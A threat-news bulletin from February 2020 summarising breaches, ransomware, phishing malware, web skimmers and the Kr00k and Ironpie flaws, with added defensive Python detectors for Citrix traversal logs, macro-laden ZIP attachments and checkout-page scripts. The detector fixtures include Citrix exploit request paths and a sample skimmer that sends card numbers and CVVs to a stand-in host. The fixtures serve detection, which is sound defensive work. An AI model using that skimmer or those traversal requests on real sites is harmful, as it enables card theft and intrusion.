
CloudSEK Daily Threat Bulletin – 26th February 2020

Round Up of Major Breaches and Scams

Law enforcement partner Clearview notifies customers of breach

Clearview AI, a facial recognition platform sold to law enforcement agencies, has notified its customers of a breach that exposed its client list, the accounts each client holds, and the searches they have run. The company, which has purportedly scraped about 3 billion facial images from the web, maintains that its servers were not accessed and that the flaw that made the intrusion possible has been patched. The leak is significant because Clearview has so far refused to disclose who its clients are.

Round Up of Major Malware and Ransomware Incidents

DoppelPaymer attacks Bretagne Télécom by exploiting Citrix flaw

Threat actors behind DoppelPaymer launched a ransomware attack on French cloud hosting company Bretagne Télécom, demanding a ransom of 35 bitcoins (~$330K). The company said the attackers exploited the Citrix vulnerability CVE-2019-19781 (a path traversal in Citrix ADC and Gateway) to gain access and drop the ransomware payload. The DoppelPaymer operators stated that the attack was launched in the first half of January 2020. Bretagne Télécom was able to restore its customers' data from backups. Though the company has denied any data leak, the attackers have published a few sample files on their leak site.
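Exploitation of CVE-2019-19781 leaves a recognisable trail in the HTTP access logs of a Citrix ADC/Gateway: the published traversal reaches the /vpns/ directory (for example smb.conf or newbm.pl) through a ".." path segment. The Python script below is an added example, not code from the bulletin or from Bretagne Télécom, that flags such requests in Common Log Format lines; the log lines, IP addresses and timestamps are constructed for the example. It decodes URL-encoded dots before matching, since a plain "/../" string match misses encoded probes.

```python
import re
from urllib.parse import unquote

# Sample access-log lines (constructed for this example, not real traffic).
# The "/vpn/../vpns/..." shape is the published CVE-2019-19781 indicator;
# the IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jan/2020:03:14:07 +0000] "GET /vpn/index.html HTTP/1.1" 200 5123
203.0.113.7 - - [09/Jan/2020:03:14:09 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 340
203.0.113.7 - - [09/Jan/2020:03:14:12 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 112
198.51.100.4 - - [09/Jan/2020:03:15:01 +0000] "GET /vpn/%2e%2e/vpns/portal/scripts/newbm.pl HTTP/1.1" 200 98
198.51.100.9 - - [09/Jan/2020:03:16:40 +0000] "GET /vpns/portal/scripts/newbm.pl HTTP/1.1" 403 0
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
VPNS_DIR = re.compile(r"/vpns/", re.IGNORECASE)
DOT_DOT = re.compile(r"(^|/)\.\.(/|$)")


def is_citrix_traversal(path):
    """True when a request path reaches /vpns/ via a '..' segment.

    Decoding twice catches single- and double-URL-encoded dots; the query
    string is dropped so '..' inside a parameter does not count.
    """
    decoded = unquote(unquote(path)).split("?", 1)[0]
    return bool(VPNS_DIR.search(decoded)) and bool(DOT_DOT.search(decoded))


def scan_log(text):
    """Return (ip, method, path, status) for each line that looks like an exploit attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_citrix_traversal(m["path"]):
            hits.append((m["ip"], m["method"], m["path"], m["status"]))
    return hits


if __name__ == "__main__":
    for ip, method, path, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {status}")
```

A traversal request that returned 200, especially a POST to newbm.pl, should be treated as a likely compromise rather than a blocked probe, even if the appliance has since been patched. The last sample line, a direct /vpns/ path with no traversal, is deliberately not flagged: the indicator is the combination of the directory and the ".." segment, which is also what Citrix's interim responder-policy mitigation keyed on.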

New malware ForeLord used by Iranian APT group to run phishing campaigns

Researchers have uncovered what appears to be a spear-phishing campaign run by the Iranian APT group Cobalt Ulster (also tracked as MuddyWater) using a new malware, ForeLord. The emails targeted organizations in Turkey, Jordan, Iraq, Georgia and Azerbaijan. Though they carry new malware, the emails themselves are quite generic: the recipient is asked to open a ZIP file containing a malicious Excel document, which instructs the user to 'enable content'. Doing so does not disable the system's security controls; it switches off Office's macro protection for that document, letting the embedded macro run and install the malware. Once installed, the malware drops credential-stealing tools, tests the harvested credentials, and creates a reverse SSL tunnel back to the attackers.
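The infection chain above only works if the recipient enables macros, so a mail gateway can stop it earlier by refusing ZIP attachments that contain macro-enabled Office documents. The Python below is an added example, not code from the researchers or the bulletin, that unpacks a ZIP attachment in memory and inspects each Office file for a VBA project part or an Excel 4.0 macro sheet, judging by the package contents rather than the file extension; the attachment it scans is constructed inline and the file names are made up.

```python
import io
import zipfile

# OOXML (.xlsm/.docm/.pptm) parts that hold a VBA project.
VBA_PARTS = {"xl/vbaProject.bin", "word/vbaProject.bin", "ppt/vbaProject.bin"}
# Excel 4.0 (XLM) macro sheets live here, with no vbaProject.bin at all.
MACROSHEET_PREFIX = "xl/macrosheets/"
# Magic bytes of legacy OLE2 documents (.xls/.doc); their macros sit in OLE streams.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def classify_document(data):
    """Classify one attachment by content: 'macro', 'clean', 'legacy-binary' or 'other'.

    The extension is ignored on purpose: an .xlsm renamed to .xlsx still carries
    xl/vbaProject.bin and Excel will still offer to enable it.
    """
    if data.startswith(OLE_MAGIC):
        return "legacy-binary"  # needs an OLE parser (e.g. oletools) to inspect
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return "other"
    with zipfile.ZipFile(io.BytesIO(data)) as doc:
        names = set(doc.namelist())
        if "[Content_Types].xml" not in names:
            return "other"  # a zip, but not an Office package
        has_vba = bool(names & VBA_PARTS)
        has_xlm = any(n.startswith(MACROSHEET_PREFIX) for n in names)
        return "macro" if (has_vba or has_xlm) else "clean"


def scan_zip_attachment(zip_bytes):
    """Return {member name: verdict} for every file inside the outer ZIP."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as outer:
        for info in outer.infolist():
            if not info.is_dir():
                verdicts[info.filename] = classify_document(outer.read(info))
    return verdicts


def should_block(verdicts):
    """Gateway policy: block if any member has macros or needs deeper (OLE) inspection."""
    return any(v in ("macro", "legacy-binary") for v in verdicts.values())


def _ooxml_package(extra_parts):
    """Build a minimal Office package in memory (constructed sample, not a real workbook)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("xl/workbook.xml", b"<workbook/>")
        for name, body in extra_parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def build_sample_attachment():
    """Constructed ZIP: a VBA workbook, an XLM workbook, a plain one and a legacy .xls stub."""
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("invoice.xlsm", _ooxml_package({"xl/vbaProject.bin": b"\x00fake-vba\x00"}))
        z.writestr("report.xlsx", _ooxml_package({"xl/macrosheets/sheet1.xml": b"<macrosheet/>"}))
        z.writestr("notes.xlsx", _ooxml_package({}))
        z.writestr("old.xls", OLE_MAGIC + b"\x00" * 16)
    return outer.getvalue()


if __name__ == "__main__":
    result = scan_zip_attachment(build_sample_attachment())
    print(result, "-> block" if should_block(result) else "-> allow")
```

Legacy binary formats are returned as a separate verdict rather than guessed at: deciding whether an .xls contains a VBA project requires walking the OLE compound file, which the standard library does not do. A gateway that cannot run that deeper check should treat "legacy-binary" the same as "macro", as should_block() does here.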

Reading Municipal Light Department targeted by ransomware attack

Reading Municipal Light Department (RMLD), a Massachusetts electric utility serving about 68,000 residents, announced that it was targeted by a ransomware attack discovered on 21st February 2020. There is no evidence that the attack affected the electricity supply or that any customer data was compromised. No information has been released on the ransomware family involved or on how the attackers got in.

Over 30 months, 18 skimmers targeted Reprint Mint photo store

Reprint Mint, an online photo printing store that also sells prints of ESPN magazine covers, has been repeatedly targeted by web skimmers that steal payment card data entered at checkout. At least 18 distinct skimmers have been found on the site since August 2017, and at times more than one was active at once, indicating that several attackers were targeting the site independently. The latest skimmer was installed on 23rd January 2020 and was still running on the site at the time of writing.
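A skimmer of the kind described above is JavaScript that runs on the checkout page, reads the card fields and sends them to a server the attacker controls. A site owner can catch that without reading every line of code by auditing the page's script elements: any external script from a host that is not on the allowlist, and any inline script that both references payment fields and makes an outbound request, deserves a look. The Python below is an added example, not code from the bulletin or from Reprint Mint; the checkout page it audits, its hostnames and the skimmer-shaped snippet are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page: a first-party script, a known CDN, an unknown
# third-party script and an inline snippet shaped like a skimmer. All
# hostnames are made up.
SAMPLE_PAGE = """
<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="/static/js/checkout.js"></script>
<script src="https://cdn.shop.example/lib/jquery.min.js"></script>
<script src="https://stats-collect.example.net/t.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = document.querySelector('[name=card_number]').value + '|' +
            document.querySelector('[name=cvv]').value;
    new Image().src = 'https://stats-collect.example.net/p?d=' + btoa(d);
  });
</script>
<script>console.log('page ready');</script>
</body></html>
"""

PAYMENT_FIELDS = re.compile(r"card[_-]?number|cvv|cvc|expir", re.IGNORECASE)
SEND_CALLS = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._body = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._body = []

    def handle_data(self, data):
        if self._body is not None:  # only collect while inside a <script>
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._body is not None:
            self.scripts.append((self._src, "".join(self._body)))
            self._src, self._body = None, None


def audit_scripts(html, page_host, allowed_hosts):
    """Return findings: external scripts from hosts outside the allowlist, and
    inline scripts that both touch payment fields and send data somewhere."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = urlparse(src).hostname or page_host  # relative URL = first party
            if host not in allowed_hosts:
                findings.append(("external", src))
        elif PAYMENT_FIELDS.search(body) and SEND_CALLS.search(body):
            findings.append(("inline", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    allowed = {"shop.example", "cdn.shop.example"}
    for kind, what in audit_scripts(SAMPLE_PAGE, "shop.example", allowed):
        print(kind, what)
```

Run from an external vantage point against the live checkout page on a schedule and diff the result against the last known-good run; a skimmer added to a first-party file that is already on the allowlist will only show up as a changed hash of that file, so pair this with a content hash or Subresource Integrity on the scripts you ship. The inline heuristic is deliberately narrow (payment field names plus an outbound call), which keeps false positives low on a checkout page but will miss a skimmer that obfuscates both.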

Round Up of Major Vulnerabilities and Patches

Kr00k flaw made 1 billion Wi-Fi capable devices vulnerable to attacks

Before it was patched, the Kr00k vulnerability (CVE-2019-15126) could have been exploited to extract sensitive information from the wireless traffic of more than 1 billion Wi-Fi-capable devices. The flaw, which affects Broadcom and Cypress Wi-Fi chips, causes a device to encrypt a portion of its traffic with an all-zero session key: after a disassociation, which an attacker in range can trigger, frames still buffered in the chip are transmitted encrypted with a zeroed key. A nearby attacker can capture those frames and decrypt them trivially, without knowing the Wi-Fi password. Broadcom and Cypress have patched the flaw; the fix reaches end devices only through vendor firmware or operating system updates.

Six flaws found in the Ironpie M6 connected vacuum cleaner

Six flaws have been found in the Ironpie M6 connected vacuum cleaner, which comes with a mobile app and a built-in camera. The vulnerabilities, located in the app and in the device's connectivity protocol, can be exploited to launch denial of service (DoS) attacks and to view a user's home through the camera. The most severe of them can be exploited to access the video stream of any affected device, anywhere in the world. Since these vulnerabilities have not been patched, the only mitigation is for users to cover the camera or disconnect the device from Wi-Fi.
